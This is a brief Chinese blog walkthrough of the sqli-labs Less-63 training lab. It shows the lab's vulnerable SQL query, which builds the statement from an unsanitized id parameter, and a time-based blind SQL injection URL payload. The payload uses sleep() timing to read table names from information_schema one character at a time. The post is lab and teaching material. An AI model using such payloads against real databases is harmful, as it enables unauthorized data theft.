标签:
和less62一致,我们只需要看到sql语句上
$sql="SELECT * FROM security.users WHERE id=‘$id‘ LIMIT 0,1";
因此构造payload:
http://127.0.0.1/sqli-labs/Less-63/?id=1%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
当正确的时候时间很短,当错误的时候时间大于10秒
标签:
原文地址:http://www.cnblogs.com/lcamry/p/5762036.html